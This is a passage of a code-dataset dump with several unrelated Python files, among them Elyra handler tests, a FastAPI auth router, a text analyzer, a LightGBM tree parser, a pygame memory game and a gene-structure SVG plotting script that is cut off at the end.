message=\"issue\")\n\n monkeypatch.setattr(PipelineValidationManager, \"validate\", lambda x, y: _async_return(bad_validation_response))\n\n json_body = json.dumps(request_body)\n\n # Will raise HTTP error so we need to catch with pytest\n with pytest.raises(HTTPClientError):\n await jp_fetch(\"elyra\", \"pipeline\", \"export\", body=json_body, method=\"POST\")\n\n\nasync def test_validation_handler(jp_fetch, monkeypatch):\n request_body = {\"pipeline\": \"body\", \"export_format\": \"py\", \"export_path\": \"test.py\", \"overwrite\": True}\n\n monkeypatch.setattr(PipelineValidationManager, \"validate\", lambda x, y: _async_return(ValidationResponse()))\n json_body = json.dumps(request_body)\n http_response = await jp_fetch(\"elyra\", \"pipeline\", \"validate\", body=json_body, method=\"POST\")\n\n assert http_response.code == 200\n\n\nasync def test_get_pipeline_parameters_schema(jp_fetch, caplog):\n # Ensure all valid components can be found\n unsupported_runtime_types = [RuntimeProcessorType.LOCAL, RuntimeProcessorType.APACHE_AIRFLOW]\n for runtime_type in unsupported_runtime_types:\n with pytest.raises(HTTPClientError) as e:\n await jp_fetch(\"elyra\", \"pipeline\", runtime_type.name, \"parameters\", method=\"GET\")\n assert expected_http_error(e, 405)\n msg_body = json.loads(e.value.response.body.decode()).get(\"message\")\n assert \"does not support pipeline parameters\" in msg_body\n\n runtime_type = RuntimeProcessorType.KUBEFLOW_PIPELINES\n response = await jp_fetch(\"elyra\", \"pipeline\", \"components\", runtime_type.name)\n assert response.code == 200\n","repo_name":"elyra-ai/elyra","sub_path":"elyra/tests/pipeline/test_handlers.py","file_name":"test_handlers.py","file_ext":"py","file_size_in_byte":13848,"program_lang":"python","lang":"en","doc_type":"code","stars":1696,"dataset":"github-code","pt":"35"} +{"seq_id":"69860819621","text":"from fastapi import APIRouter, Response, status, Depends\n\nfrom schemas import schemas\nfrom services.auth import AuthService\nfrom services.user import JWTBearer\n\nrouter = APIRouter(\n prefix='/auth',\n tags=['auth'],\n)\n\n\n@router.post(\n '/register',\n status_code=status.HTTP_201_CREATED,\n response_model=schemas.UserResponseSchema\n)\nasync def create_user(\n payload: schemas.CreateUserSchema,\n auth_service: AuthService = Depends()\n):\n return auth_service.register_new_user(payload)\n\n\n@router.post(\n '/authenticate',\n status_code=status.HTTP_200_OK,\n response_model=schemas.TokenSchema\n)\nasync def authenticate_user(\n payload: schemas.LoginUserSchema,\n auth_service: AuthService = Depends(),\n):\n return auth_service.authenticate_user(payload)\n","repo_name":"GoreevArtem/TrashDetectApi","sub_path":"backend/api/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"22712130793","text":"import re\nimport sys\nimport pandas as pd\n\ndef read_file(path):\n ''' Reads file is as a string. '''\n with open(path, 'r') as f:\n return f.read()\n\ndef get_words(s):\n ''' Returns a list of words from an inputted string. '''\n s = re.sub('[.!?,:;]', '', s)\n return [word.lower() for word in s.split(' ') if word != '']\n\ndef get_sentences(s):\n ''' Returns a list of sentences from an inputted string. '''\n return [sent for sent in re.split('[.!?]', s) if sent != '']\n\ndef word_count(s):\n ''' Returns total word count in inputted string. '''\n return len(get_words(s))\n\ndef unique_words (s):\n ''' Returns set of unique words from inputted string. '''\n return len(set(get_words(s)))\n\ndef avg_word_len(w):\n ''' Returns average word length in inputted string as float. '''\n return sum(len(word) for word in get_words(w)) / len(get_words(w))\n\ndef sent_count(s):\n ''' Returns total sentence count in inputted string. '''\n return len(get_sentences(s))\n\ndef avg_sent_len(s):\n ''' Returns average sentence length in inputted string as float. '''\n return sum(word_count(sent) for sent in get_sentences(s)) / sent_count(s)\n\ndef word_count_desc(s):\n ''' Returns a pandas DataFrame of frequently used words (at least one percent of text) in descending order of frequency from inputted string. '''\n word_count_dict = {}\n for w in set(get_words(s)):\n word_count_dict.update({w: get_words(s).count(w)})\n word_count_df = pd.DataFrame.from_dict(word_count_dict, orient='index')\n word_count_df = word_count_df.sort_values(by=[0], ascending=False)\n word_count_df = word_count_df[word_count_df[0]>(word_count(s)/100)]\n return word_count_df\n\ndef word_with_count(s):\n ''' Returns dictionary object from inputted string: keys equal unique words, values equal word count. '''\n word_count_dict = {}\n for w in set(get_words(s)):\n word_count_dict.update({w: get_words(s).count(w)})\n return word_count_dict\n\ndef freq_phrases(s):\n '''\n Sets of three or more words used three or more times.\n '''\n pass\n\n\nassert word_count('These, are words!!') == 3\nassert word_count(' will this work?') == 3\nassert unique_words('how many Words many words?') == 3\nassert unique_words('the cat sat the sat cat bat!') == 4\nassert avg_word_len(\"this is this a test, a test! its test\") == 3\nassert avg_word_len('One two Three four, fives!') == 4\nassert sent_count('One. Two. Three! Four and five and six?') == 4\nassert sent_count('Many, many sentences. Some, are long. Some are short!') == 3\nassert avg_sent_len('One. Two. Three! Four and five and six?') == 2\nassert avg_sent_len('Many, many sentences. Some, long. Some are short! Ha Ha!') == 2.5\n# assert word_list_desc('Try these words out. Try again words. Try!') == ['try', 'words', 'again', 'these', 'out']\n# lists are inherently unordered, making the assert fail\nassert word_with_count('Try these words out. Try again words. Try!') == {'again': 1, 'out': 1, 'these': 1, 'try': 3, 'words': 2}\n\nif __name__ == '__main__':\n # if this is the main script, not a module imported into another script\n text = read_file(sys.argv[1]) #sys.argv[1] refers to second item in command\n print('Word count: {}'.format(word_count(text)))\n print('Unique words: {}'.format(unique_words(text)))\n print('Average word length: {}'.format(round(avg_word_len(text), 2)))\n print('Sentence count: {}'.format(sent_count(text)))\n print('Average sentence length: {}'.format(round(avg_sent_len(text), 2)))\n if input('Type y to see a list of most common words in desceding order of frequency. Type p to pass.') == 'y':\n print(word_count_desc(text))\n if input('Type y to see a dictionary of all words with their frequency. Type q to quit.') == 'y':\n print(word_with_count(text))\n","repo_name":"jeremymiller00/Pure_python_projects","sub_path":"Text_analyzer.py","file_name":"Text_analyzer.py","file_ext":"py","file_size_in_byte":3809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14399928541","text":"import numpy as np\nimport lightgbm as lgb\n\ndef find_all_children_splits(split, splits_dict):\n \"\"\"\n This helper function finds all multigeneration children splits for an \n argument split.\n\n Arguments:\n split --The split for which you are trying to find children splits\n splits_dict -- A dictionary of all the splits in the tree\n \n Returns:\n A list containing the Node IDs of all children splits\n \"\"\"\n all_splits = []\n\n # Check if the immediate left child of the argument split is also a split.\n # If so append to the list then use recursion to generate the remainder\n left_child = splits_dict[split]['children'][0]\n if left_child in splits_dict:\n all_splits.append(left_child)\n all_splits.extend(find_all_children_splits(left_child, splits_dict))\n\n # Same as above but with right child\n right_child = splits_dict[split]['children'][1]\n if right_child in splits_dict:\n all_splits.append(right_child)\n all_splits.extend(find_all_children_splits(right_child, splits_dict))\n\n return all_splits\n\ndef find_all_children_leaves(split, splits_dict, leaves_dict):\n \"\"\"\n This helper function finds all multigeneration children leaves for an \n argument split.\n\n Arguments:\n split -- The split for which you are trying to find children leaves\n splits_dict -- A dictionary of all the split info in the tree\n leaves_dict -- A dictionary of all the leaf info in the tree\n\n Returns:\n A list containing all the Node IDs of all children leaves\n \"\"\"\n all_leaves = []\n\n # Find all the splits that are children of the relevant split\n all_splits = find_all_children_splits(split, splits_dict)\n\n # Ensure the current split is included\n if split not in all_splits:\n all_splits.append(split)\n\n # For each leaf, check if the parents appear in the list of children\n # splits (all_splits). If so, it must be a leaf of the argument split\n for leaf in leaves_dict:\n if leaves_dict[leaf]['parent'] in all_splits:\n all_leaves.append(leaf)\n\n return all_leaves\n\ndef parse_model(model):\n if str(type(model)) == \"\":\n whole_model = model.dump_model()\n else:\n model = lgb.Booster(model_file = model)\n # change the model to json format\n whole_model = model.dump_model()\n\n tree = {}\n for i in range(whole_model['tree_info'][-1]['tree_index']+1):\n\n node = whole_model['tree_info'][i][\"tree_structure\"]\n\n queue = [node]\n splits = {}\n\n # the very first node\n splits[\"split\"+str(queue[0][\"split_index\"])] = {'th': queue[0][\"threshold\"],\n 'col': queue[0][\"split_feature\"] }\n\n # flow though the tree\n while queue:\n \n # left child\n if \"left_child\" in queue[0].keys():\n queue.append(queue[0][\"left_child\"])\n # child is a split\n if \"split_index\" in queue[0][\"left_child\"].keys():\n splits[\"split\"+str(queue[0][\"left_child\"][\"split_index\"])] = {'parent': \"split\"+str(queue[0][\"split_index\"]),\n 'direction': 'left',\n 'th': queue[0][\"left_child\"][\"threshold\"], \n 'col': queue[0][\"left_child\"][\"split_feature\"]}\n # child is a leaf\n else:\n splits[\"leaf\"+str(queue[0][\"left_child\"][\"leaf_index\"])] = {'parent': \"split\"+str(queue[0][\"split_index\"]),\n 'direction': 'left', \n 'intercept': queue[0][\"left_child\"][\"leaf_const\"], \n 'slope': queue[0][\"left_child\"][\"leaf_coeff\"]}\n \n # right child\n if \"right_child\" in queue[0].keys():\n queue.append(queue[0][\"right_child\"]) \n # child is a split\n if \"split_index\" in queue[0][\"right_child\"].keys():\n splits[\"split\"+str(queue[0][\"right_child\"][\"split_index\"])] = {'parent': \"split\"+str(queue[0][\"split_index\"]),\n 'direction': 'right',\n 'th': queue[0][\"right_child\"][\"threshold\"], \n 'col': queue[0][\"right_child\"][\"split_feature\"]}\n # child is a leaf\n else:\n splits[\"leaf\"+str(queue[0][\"right_child\"][\"leaf_index\"])] = {'parent': \"split\"+str(queue[0][\"split_index\"]),\n 'direction': 'right',\n 'intercept': queue[0][\"right_child\"][\"leaf_const\"], \n 'slope': queue[0][\"right_child\"][\"leaf_coeff\"]}\n # delet the first node\n queue.pop(0)\n\n tree['tree'+str(i)] = splits\n\n nested_splits = {}\n nested_leaves = {}\n nested_thresholds = {}\n\n n_inputs = model.num_feature()\n for index in tree:\n\n splits = tree[index]\n for i in splits:\n # print(i)\n if 'parent' in splits[i].keys():\n splits[splits[i]['parent']]['children'] = []\n\n for i in splits:\n # print(i)\n if 'parent' in splits[i].keys():\n if splits[i]['direction'] == 'left': \n splits[splits[i]['parent']]['children'].insert(0,i)\n if splits[i]['direction'] == 'right': \n splits[splits[i]['parent']]['children'].insert(11,i)\n\n leaves = {}\n for i in splits.keys():\n if i[0] == 'l':\n leaves[i] = splits[i]\n\n for leaf in leaves:\n del splits[leaf]\n\n for split in splits:\n # print(\"split:\" + str(split))\n left_child = splits[split]['children'][0]\n right_child = splits[split]['children'][1]\n \n if left_child in splits:\n # means left_child is split\n splits[split]['left_leaves'] = find_all_children_leaves(\n left_child, splits, leaves\n )\n else:\n # means left_child is leaf\n splits[split]['left_leaves'] = [left_child]\n # print(\"left_child\" + str(left_child))\n \n if right_child in splits:\n splits[split]['right_leaves'] = find_all_children_leaves(\n right_child, splits, leaves\n )\n else:\n splits[split]['right_leaves'] = [right_child]\n # print(\"right_child\" + str(right_child))\n\n splitting_thresholds = {}\n for split in splits:\n var = splits[split]['col']\n splitting_thresholds[var] = {}\n for split in splits:\n var = splits[split]['col']\n splitting_thresholds[var][split] = splits[split]['th']\n\n for var in splitting_thresholds:\n splitting_thresholds[var] = dict(sorted(splitting_thresholds[var].items(), key=lambda x: x[1]))\n\n for split in splits:\n var = splits[split]['col']\n splits[split]['y_index'] = []\n splits[split]['y_index'].append(var)\n splits[split]['y_index'].append(\n list(splitting_thresholds[var]).index(split)\n )\n\n features = np.arange(0,n_inputs)\n\n for leaf in leaves:\n leaves[leaf]['bounds'] = {}\n for th in features:\n for leaf in leaves:\n leaves[leaf]['bounds'][th] = [None, None]\n \n # import pprint\n # pp = pprint.PrettyPrinter(indent=4)\n # pp.pprint(splits)\n # pp.pprint(leaves)\n for split in splits:\n var = splits[split]['col']\n for leaf in splits[split]['left_leaves']:\n leaves[leaf]['bounds'][var][1] = splits[split]['th']\n\n for leaf in splits[split]['right_leaves']:\n leaves[leaf]['bounds'][var][0] = splits[split]['th']\n\n nested_splits['tree' + str(index)] = splits\n nested_leaves['tree' + str(index)] = leaves\n nested_thresholds['tree' + str(index)] = splitting_thresholds\n\n return nested_splits, nested_leaves, nested_thresholds\n ","repo_name":"linshumeng/OMLT_ML","sub_path":"src/lightgbm_model.py","file_name":"lightgbm_model.py","file_ext":"py","file_size_in_byte":8703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"13127432019","text":"import pygame\nfrom pygame.locals import *\nimport sys\nfrom game import *\n\nFPS = 30 #frames per second\nMOVE_TIME = 500 #moves will be displayed for 1 second\nSCREEN_SIZE = (500, 500)\n\ndef main():\n\n\tpygame.init()\n\n\tscreen = pygame.display.set_mode(SCREEN_SIZE)\n\tclock = pygame.time.Clock()\n\tpygame.display.set_caption(\"PyMemory\")\n\n\tgame = Game(SCREEN_SIZE[0], SCREEN_SIZE[1])\n\tgame.draw_all(screen)\n\tgame.generate_moves()\n\tgame.update_score(screen)\n\tgame.draw_credits(screen)\n\n\telapsed = 0\n\ti = 0\n\tlast = 0\n\tdrawn = False\n\tpause = False\n\n\twhile 1:\n\t\telapsed += clock.tick(FPS)\n\n\t\tif game.current_player == 0: #CPU turn\n\t\t\tif pause == False: \n\t\t\t\tif drawn == False:\n\t\t\t\t\tgame.delete_cpu_move(screen, game.cpu_moves[last])\n\t\t\t\t\tgame.draw_cpu_move(screen, game.cpu_moves[i])\n\t\t\t\t\tdrawn = True\n\t\t\t\tif elapsed >= MOVE_TIME:\n\t\t\t\t\tlast = i\n\t\t\t\t\ti += 1\n\t\t\t\t\tif i > len(game.cpu_moves) - 1:\n\t\t\t\t\t\tgame.toggle_turn()\n\t\t\t\t\tgame.delete_cpu_move(screen, game.cpu_moves[last])\n\t\t\t\t\telapsed = 0\n\t\t\t\t\tdrawn = False\n\t\t\t\t\tpause = True\n\t\t\telse:\n\t\t\t\tif elapsed >= MOVE_TIME:\n\t\t\t\t\tpause = False\n\t\t\t\t\telapsed = 0\n\n\t\t\tpygame.event.clear([pygame.KEYDOWN, pygame.KEYUP]) #ignore events when clicking during CPU turn\n\t\t\tfor event in pygame.event.get():\n\t\t\t\tif event.type == pygame.QUIT:\n\t\t\t\t\tsys.exit(0)\n\n\t\telif game.current_player == 1: #Player turn\n\t\t\tfor event in pygame.event.get():\n\t\t\t\tif event.type == pygame.QUIT:\n\t\t\t\t\tsys.exit(0)\n\t\t\t\telif event.type == pygame.KEYDOWN:\n\t\t\t\t\tif event.key == K_ESCAPE:\n\t\t\t\t\t\tsys.exit(0)\n\t\t\t\t\telif event.key == K_UP:\n\t\t\t\t\t\tgame.draw_to(screen, 0)\n\t\t\t\t\telif event.key == K_RIGHT:\n\t\t\t\t\t\tgame.draw_to(screen, 1)\n\t\t\t\t\telif event.key == K_DOWN:\n\t\t\t\t\t\tgame.draw_to(screen, 2)\n\t\t\t\t\telif event.key == K_LEFT:\n\t\t\t\t\t\tgame.draw_to(screen, 3)\n\t\t\t\telif event.type == pygame.KEYUP:\n\t\t\t\t\tif event.key == K_UP:\n\t\t\t\t\t\tgame.draw_from(screen, 0)\n\t\t\t\t\telif event.key == K_RIGHT:\n\t\t\t\t\t\tgame.draw_from(screen, 1)\n\t\t\t\t\telif event.key == K_DOWN:\n\t\t\t\t\t\tgame.draw_from(screen, 2)\n\t\t\t\t\telif event.key == K_LEFT:\n\t\t\t\t\t\tgame.draw_from(screen, 3)\n\n\t\t\t\t\tif len(game.cpu_moves) == len(game.player_moves):\n\t\t\t\t\t\tgame.check_solution()\n\t\t\t\t\t\tgame.generate_moves()\n\t\t\t\t\t\tgame.toggle_turn()\n\t\t\t\t\t\tgame.update_score(screen)\n\t\t\t\t\t\telapsed = 0\n\t\t\t\t\t\ti = 0\n\t\t\t\t\t\tlast = 0\n\t\t\t\t\t\tdrawn = False\n\n\t\tpygame.display.flip()\n\nif __name__== \"__main__\":\n main()","repo_name":"Pyr0x1/PyMemory","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"19580432669","text":"from pyarrow._compute import ( # noqa\n FilterOptions,\n Function,\n FunctionRegistry,\n function_registry,\n call_function\n)\nimport pyarrow._compute as _pc\n\n\ndef cast(arr, target_type, safe=True):\n \"\"\"\n Cast array values to another data type. Can also be invoked as an array\n instance method.\n\n Parameters\n ----------\n arr : Array or ChunkedArray\n target_type : DataType or type string alias\n Type to cast to\n safe : bool, default True\n Check for overflows or other unsafe conversions\n\n Examples\n --------\n >>> from datetime import datetime\n >>> import pyarrow as pa\n >>> arr = pa.array([datetime(2010, 1, 1), datetime(2015, 1, 1)])\n >>> arr.type\n TimestampType(timestamp[us])\n\n You can use ``pyarrow.DataType`` objects to specify the target type:\n\n >>> cast(arr, pa.timestamp('ms'))\n \n [\n 2010-01-01 00:00:00.000,\n 2015-01-01 00:00:00.000\n ]\n\n >>> cast(arr, pa.timestamp('ms')).type\n TimestampType(timestamp[ms])\n\n Alternatively, it is also supported to use the string aliases for these\n types:\n\n >>> arr.cast('timestamp[ms]')\n \n [\n 1262304000000,\n 1420070400000\n ]\n >>> arr.cast('timestamp[ms]').type\n TimestampType(timestamp[ms])\n\n Returns\n -------\n casted : Array\n \"\"\"\n if target_type is None:\n raise ValueError(\"Cast target type must not be None\")\n if safe:\n options = _pc.CastOptions.safe(target_type)\n else:\n options = _pc.CastOptions.unsafe(target_type)\n return call_function(\"cast\", [arr], options)\n\n\ndef _simple_unary_function(name):\n def func(arg):\n return call_function(name, [arg])\n return func\n\n\nascii_length = _simple_unary_function('ascii_length')\nascii_upper = _simple_unary_function('ascii_upper')\n\n\ndef sum(array):\n \"\"\"\n Sum the values in a numerical (chunked) array.\n\n Parameters\n ----------\n array : pyarrow.Array or pyarrow.ChunkedArray\n\n Returns\n -------\n sum : pyarrow.Scalar\n \"\"\"\n return call_function('sum', [array])\n","repo_name":"alimcmaster1/arrow","sub_path":"python/pyarrow/compute.py","file_name":"compute.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"35"} +{"seq_id":"34235889042","text":"import sys,random\n\nnum1=int(sys.argv[1])\nnum2=int(sys.argv[2])\nr=random.randint(num1, num2)\nwhile True:\n a=int(input('guess a number between 1 to 10: '))\n if(num1 num1:\n MinNum = num1\n if MinNum > num2:\n MinNum = num2\n if MaxNum == -99999:\n MaxNum = num1\n if MaxNum < num1:\n MaxNum = num1\n if MaxNum < num2:\n MaxNum = num2\n\n return (MinNum, MaxNum)\n\ndef GetTagInfo(locus, tag, info):\n posdata=[]\n for line in info:\n line = line.strip()\n if line =='':\n continue\n if locus in line:\n columns = line.split(\"\\t\")\n if tag in columns[1].lower():\n posdata.append(columns[2] + \"-\" + columns[3])\n return posdata\n\ndef GetChainOrientation(locus, info):\n posdata=[]\n for line in info:\n line = line.strip()\n if line =='':\n continue\n if locus in line:\n columns = line.split(\"\\t\")\n chain = columns[-1]\n break\n return chain\n\ndef GetDomainInfo(locus, tag, info):\n posdata=[]\n for line in info:\n line = line.strip()\n if line =='':\n continue\n if locus in line:\n columns = line.split(\"\\t\")\n if tag in columns[1].lower():\n posdata.append(columns[4] + \"-\" + columns[2] + \"-\" + columns[3])\n return posdata\n\ndef SortCDSInfo(locus, tag, info):\n newinfo = []\n cdsposinfo = []\n for line in info:\n line = line.strip()\n if line == '':\n continue\n if locus in line and tag in line.lower():\n newinfo.append(line)\n cdsposinfo.append(int(line.split(\"\\t\")[2]))\n cdsposinfo.append(int(line.split(\"\\t\")[3]))\n if len(newinfo) > 0:\n chain = newinfo[0].split(\"\\t\")[-1]\n if chain == \"+\":\n cdsposinfo.sort()\n else:\n cdsposinfo.sort(reverse=True)\n return cdsposinfo\n\ndef Domain2CDS(start, length, info):\n data2return =[]\n if info[0] < info[1]:\n numinfo = GetConNum(info)\n index1 = start - 1\n index2 = index1 + length - 1\n numinfo2 = GetNumRange(numinfo[index1:index2+1])\n i = 0\n while i < len(numinfo2):\n data2return.append(str(numinfo2[i]) + \"-\" + str(numinfo2[i+1]))\n i += 2\n\n else:\n numinfo = GetConNum(info)\n numinfo.sort(reverse = True)\n index1 = start - 1\n index2 = index1 + length - 1\n numinfo2 = GetNumRange(numinfo[index1:index2+1])\n i = 0\n while i < len(numinfo2):\n data2return.append(str(numinfo2[i]) + \"-\" + str(numinfo2[i+1]))\n i += 2\n\n return data2return\n\ndef GetConNum(info2):\n info2.sort()\n numlist = []\n i = 1\n while i < len(info2):\n for x in range(int(info2[i-1]), int(info2[i])+1):\n numlist.append(x)\n i = i + 2\n return numlist\n\ndef GetNumRange(connumlist):\n start = connumlist[0]\n rannumlist = [start,]\n i = 1\n while i < len(connumlist)-1:\n if abs(connumlist[i]-connumlist[i-1]) == 1 and abs(connumlist[i]-connumlist[i+1]) == 1:\n pass\n else:\n rannumlist.append(connumlist[i])\n i += 1\n rannumlist.append(connumlist[-1])\n return rannumlist\n\n\n\n##参数处理\nimport argparse\nparser = argparse.ArgumentParser(\n description=\"本程序用于绘制基因结构的svg图。\" + \"\\n\\nVersion: \" + __version__,\n epilog=\"Please Enjoy this Program!\")\nparser.add_argument(\n \"-i\", \"-in\", \"--input\",\n metavar=\"genefile\",\n dest=\"input\",\n type=str,\n help=\"file to input\")\n\nparser.add_argument(\n \"-o\", \"-out\", \"--output\",\n metavar=\"outfile\",\n dest=\"output\",\n type=str,\n help=\"svg file to output\")\n\nparser.add_argument(\n \"-v\", \"--version\",\n action='version',\n help=\"The version of this program.\",\n version = \"Version: \" + __version__)\nargs = parser.parse_args()\n\ntagcolors = {\n 'cds': \"green\",\n 'sts': \"orange\",\n 'domain': \"blue\",\n 'exon': \"gold\",\n 'intron': \"darkgrey\",\n 'marker': \"black\",\n 'start_codon': \"lime\",\n 'stop_codon': \"magenta\",\n 'utr': \"hotpink\",\n}\n\ndomaincolors = [\"blue\", \"aqua\", \"brown\", \"chartreuse\", \"deeppink\", \"royalblue\", \"springgreen\", \"teal\"]\n\ntags = ['utr', 'intron', 'exon', 'cds', 'sts', 'domain' 'start_codon', 'stop_codon', 'marker']\n\n\ninfofile=open(args.input, 'r')\ndata = infofile.readlines()\ndomain_ref = \"cds\"\ninfofile.close()\n\n##绘画准备\nimport svgwrite\ngspaint = svgwrite.Drawing(args.output + \".svg\", debug = True)\nx0 = 5\ny0 = 15\npaintx0=1000\nlegendx0 = 900\nlegendboxx0 = legendx0 - 5\n\nlocuslist = GetLocusList(data)\nfor locus in locuslist:\n #获取链向\n chain = GetChainOrientation(locus, data)\n #获取位置最小值、最大值\n (MinPos, MaxPos) = GetMinMax(locus, data)\n print(\"Min Value: \", MinPos)\n print(\"Max Value: \", MaxPos)\n\n Grange = MaxPos - MinPos + 1\n times = Grange / 1000\n\n #显示基因名\n gspaint.add(gspaint.text(\n locus,\n insert=(paintx0/times, y0),\n font_size = 16,\n fill = 'black'))\n y0 = y0 +60\n legendy0 = y0 + 60\n legendboxy0 = legendy0 - 5\n unit = 1000.0\n segments = Grange // unit\n #绘制链向\n if chain == '+':\n lines = gspaint.add(gspaint.g(stroke_width=2, stroke='gray', fill='none'))\n lines.add(gspaint.polyline(\n [(paintx0/times, y0 - 25), (paintx0/times + 40, y0 - 25), (paintx0/times + 40, y0 - 27.5), (paintx0/times + 45, y0 - 22.5), (paintx0/times + 40, y0 - 17.5), (paintx0/times + 40, y0 - 20), (paintx0/times, y0 - 20),(paintx0/times, y0 - 25)]))\n else:\n lines = gspaint.add(gspaint.g(stroke_width=2, stroke='gray', fill='none'))\n lines.add(gspaint.polyline(\n [(paintx0/times, y0 - 22.5), (paintx0/times + 5, y0 - 17.5), (paintx0/times + 5, y0 - 20), (paintx0/times + 45, y0 - 20), (paintx0/times + 45, y0 - 25), (paintx0/times + 5, y0 - 25), (paintx0/times + 5, y0 - 27.5),(paintx0/times, y0 - 22.5)]))\n\n\n #绘制比例尺\n scalelen = 1000.0/Grange*1000\n gspaint.add(gspaint.line(\n ((MinPos - MinPos + paintx0)/times, y0-50),\n ((MaxPos - MinPos + paintx0)/times, y0-50),\n stroke_width=2,\n stroke=\"black\"))\n i = 1\n scalex = MinPos + unit\n while i <= segments:\n gspaint.add(gspaint.line(\n ((scalex - MinPos + paintx0)/times, y0-50),\n ((scalex - MinPos + paintx0)/times, y0-45),\n stroke_width=1,\n stroke=\"gray\"))\n gspaint.add(gspaint.text(\n str(i) + \"k\",\n insert=((scalex - MinPos + paintx0)/times - 5, y0-35),\n font_size = 8,\n fill = 'black'))\n scalex += unit\n i += 1\n\n\n\n #paint utr\n utrinfo = GetTagInfo(locus, 'utr', data)\n for info in utrinfo:\n (start, end) = info.split(\"-\")\n start = int(start)\n end = int(end)\n if start < end:\n length = end - start + 1\n begin = start\n else:\n length = start - end + 1\n begin = end\n length = length / times\n gspaint.add(gspaint.rect(\n insert = ((begin - MinPos + paintx0)/times, y0+1.5),\n size = (str(length) + \"px\", \"12px\"),\n stroke_width = 0.001,\n stroke = tagcolors[\"utr\"],\n fill = tagcolors[\"utr\"]))\n\n if len(utrinfo) > 0:\n gspaint.add(gspaint.rect(\n insert = (legendx0, legendy0+1.5),\n size = (\"40px\", \"12px\"),\n stroke_width = 0.001,\n stroke = tagcolors[\"utr\"],\n fill = tagcolors[\"utr\"]))\n gspaint.add(gspaint.text(\n \"utr\",\n insert = (legendx0 + 50, legendy0+12),\n font_size = 12,\n fill = 'black'))\n legendy0 += 25\n\n #paint intron\n introninfo = GetTagInfo(locus, 'intron', data)\n for info in introninfo:\n (start, end) = info.split(\"-\")\n start = int(start)\n end = int(end)\n gspaint.add(gspaint.line(\n ((start - MinPos + paintx0)/times, y0 + 7.5),\n ((end - MinPos + paintx0)/times, y0 + 7.5),\n stroke_width = 2,\n stroke = tagcolors[\"intron\"]))\n\n if len(introninfo) > 0:\n gspaint.add(gspaint.line(\n (legendx0, legendy0+8),\n (legendx0+40, legendy0+8),\n stroke_width = 2,\n stroke = tagcolors[\"intron\"]))\n gspaint.add(gspaint.text(\n \"intron\",\n insert = (legendx0 + 50, legendy0+12),\n font_size = 12,\n fill = 'black'))\n legendy0 += 25\n\n\n\n #paint exon\n exoninfo = GetTagInfo(locus, 'exon', data)\n for info in exoninfo:\n (start, end) = info.split(\"-\")\n start = int(start)\n end = int(end)\n if start < end:\n length = end - start + 1\n begin = start\n else:\n length = start - end + 1\n begin = end\n length = length / times\n gspaint.add(gspaint.rect(\n insert = ((begin - MinPos + paintx0) / times, y0 - 5),\n size = (str(length) + \"px\", \"25px\"),\n stroke_width = 0.001,\n stroke = tagcolors[\"exon\"],\n fill = tagcolors[\"exon\"]))\n\n if len(exoninfo) > 0:\n gspaint.add(gspaint.rect(\n insert = (legendx0, legendy0),\n size = (\"40px\", \"25px\"),\n stroke_width = 0.001,\n stroke = tagcolors[\"exon\"],\n fill = tagcolors[\"exon\"]))\n gspaint.add(gspaint.text(\n \"exon\",\n insert = (legendx0 + 50, legendy0+16),\n font_size = 12,\n fill = 'black'))\n legendy0 += 35\n\n #paint cds\n cdsinfo = GetTagInfo(locus, 'cds', data)\n for info in cdsinfo:\n (start, end) = info.split(\"-\")\n start = int(start)\n end = int(end)\n if start < end:\n length = end - start + 1\n begin = start\n else:\n length = start - end + 1\n begin = end\n length = length / times\n gspaint.add(gspaint.rect(\n insert = ((begin - MinPos + paintx0) / times, y0 - 5),\n size = (str(length) + \"px\", \"25px\"),\n stroke_width = 0.001,\n stroke = tagcolors[\"cds\"],\n fill = tagcolors[\"cds\"]))\n\n if len(cdsinfo) > 0:\n gspaint.add(gspaint.rect(\n insert = (legendx0, legendy0),\n size = (\"40px\", \"25px\"),\n stroke_width = 0.001,\n stroke = tagcolors[\"cds\"],\n fill = tagcolors[\"cds\"]))\n gspaint.add(gspaint.text(\n \"CDS\",\n insert = (legendx0 + 50, legendy0+16),\n font_size = 12,\n fill = 'black'))\n legendy0 += 35\n\n\n #paint sts\n stsinfo = GetTagInfo(locus, 'sts', data)\n for info in stsinfo:\n (start, end) = info.split(\"-\")\n start = int(start)\n end = int(end)\n if start < end:\n length = end - start + 1\n begin = start\n else:\n length = start - end + 1\n begin = end\n length = length / times\n gspaint.add(gspaint.rect(\n insert = ((begin - MinPos + paintx0) / times, y0 - 5),\n size = (str(length) + \"px\", \"25px\"),\n stroke_width = 0.001,\n stroke = tagcolors[\"sts\"],\n fill = tagcolors[\"sts\"]))\n\n if len(stsinfo) > 0:\n gspaint.add(gspaint.rect(\n insert = (legendx0, legendy0),\n size = (\"40px\", \"25px\"),\n stroke_width = 0.001,\n stroke = tagcolors[\"sts\"],\n fill = tagcolors[\"sts\"]))\n gspaint.add(gspaint.text(\n \"CDS\",\n insert = (legendx0 + 50, legendy0+16),\n font_size = 12,\n fill = 'black'))\n legendy0 += 35\n\n\n #paint domain\n cdsposdata = SortCDSInfo(locus, domain_ref, data)\n if cdsposdata ==[]:\n cdsposdata = SortCDSInfo(locus, \"exon\", data)\n\n domaininfo = GetDomainInfo(locus, 'domain', data)\n domainlist = []\n for line in domaininfo:\n domainlist.append(line.split(\"-\")[0])\n\n domainset= list(set(domainlist))\n domainset.sort()\n domainsetcolors={}\n index = 0\n while index < len(domainset):\n domainsetcolors[domainset[index]] = domaincolors[index]\n index += 1\n\n for line in domaininfo:\n (domain, aa1, aa2) = line.split(\"-\")\n aa1 = int(aa1)\n aa2 = int(aa2)\n nucl0 = aa1 * 3 - 2\n length = (aa2 - aa1 + 1) * 3\n domain2cdsinfo = Domain2CDS(nucl0, length, cdsposdata)\n domainsave=[];\n for info in domain2cdsinfo:\n (start, end) = info.split(\"-\")\n start = int(start)\n end = int(end)\n if start < end:\n length = end - start + 1\n begin = start\n else:\n length = start - end + 1\n begin = end\n length = length / times\n gspaint.add(gspaint.rect(\n insert = ((begin - MinPos + paintx0) / 